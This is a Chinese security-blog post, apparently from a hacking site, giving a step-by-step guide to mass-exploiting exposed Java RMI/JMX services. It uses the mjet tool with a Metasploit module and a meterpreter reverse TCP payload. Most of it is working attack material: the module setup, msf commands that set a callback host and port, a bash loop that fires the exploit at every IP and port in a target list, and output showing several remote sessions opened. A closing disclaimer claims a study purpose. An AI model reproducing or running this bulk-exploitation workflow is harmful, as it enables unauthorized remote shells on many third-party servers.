RIM漏洞批量利用

  • 内容
  • 相关

下载mjet,https://github.com/mogwaisec/mjet

按照说明中的步骤:

Copy the "MBean" folder to "data/java/metasploit"
Copy java_mlet_server.rb to "modules/exploits/multi/misc/"
这里有个坑,metasploit默认目录里没有data/java/这个目录,需要手动创建一下,而且里面缺少Payload.class这个类,find命令找一下,因为每个人的这个class位置都可能不一样。然后把它拷进/data/java/metasploit/下

启动msf监听,选择刚才导入的那个模块

msf > use exploit/multi/misc/java_mlet_server
msf exploit(multi/misc/java_mlet_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(multi/misc/java_mlet_server) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf exploit(multi/misc/java_mlet_server) > set LPORT 4444
LPORT => 4444
msf exploit(multi/misc/java_mlet_server) > set URIPATH /bobac/
URIPATH => /bobac/
msf exploit(multi/misc/java_mlet_server) > run
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://0.0.0.0:8080/bobac/
[*] Local IP: http://1.1.1.1:8080/bobac/
[*] Server started.
然后用下载的mjet.jar让远程主机主动连接我的服务器,批量利用可以写一个shell脚本。
#!/bin/bash
function getip(){
while read i
do
    timeout 2s java -jar mjet.jar -u http://1.1.1.1:8080/bobac/ -t `echo $i|awk '{print $1}'` -p `echo $i|awk '{print $2}'`
done < rmi-ip.txt
} getip
rmi-ip.txt是存放的ip与端口文件,直接执行。msf监听到并且直接获取会话session。
msf exploit(multi/misc/java_mlet_server) >
[*] x.x.x.x java_mlet_server - handling request for /bobac/
[*] Sending stage (53859 bytes) to x.x.x.x
[*] Meterpreter session 3 opened (x.x.x.x:4444 -> x.x.x.x:33477) at 2018-02-24 17:38:05 +0800
[*] x.x.x.x java_mlet_server - handling request for /bobac/
[*] Sending stage (53859 bytes) to x.x.x.x
[*] Meterpreter session 4 opened (x.x.x.x:4444 -> x.x.x.x:33486) at 2018-02-24 17:38:08 +0800
[*] x.x.x.x java_mlet_server - handling request for /bobac/
[*] Sending stage (53859 bytes) to x.x.x.x
[*] Meterpreter session 5 opened (x.x.x.x:4444 -> x.x.x.x:19321) at 2018-02-24 17:38:22 +0800
[*] x.x.x.x java_mlet_server - handling request for /bobac/
[*] x.x.x.x java_mlet_server - handling request for /bobac/
[*] x.x.x.x java_mlet_server - handling request for /bobac/nhUsuayJ.jar
[*] Sending stage (53859 bytes) to x.x.x.x
[*] Meterpreter session 6 opened (x.x.x.x:4444 -> x.x.x.x:56411) at 2018-02-24 17:40:53 +080

1.png

参考地址:

https://www.secpulse.com/archives/6203.html

http://www.cnblogs.com/co10rway/p/8467312.html

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:RIM漏洞批量利用 - https://www.0dayhack.com/post-797.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注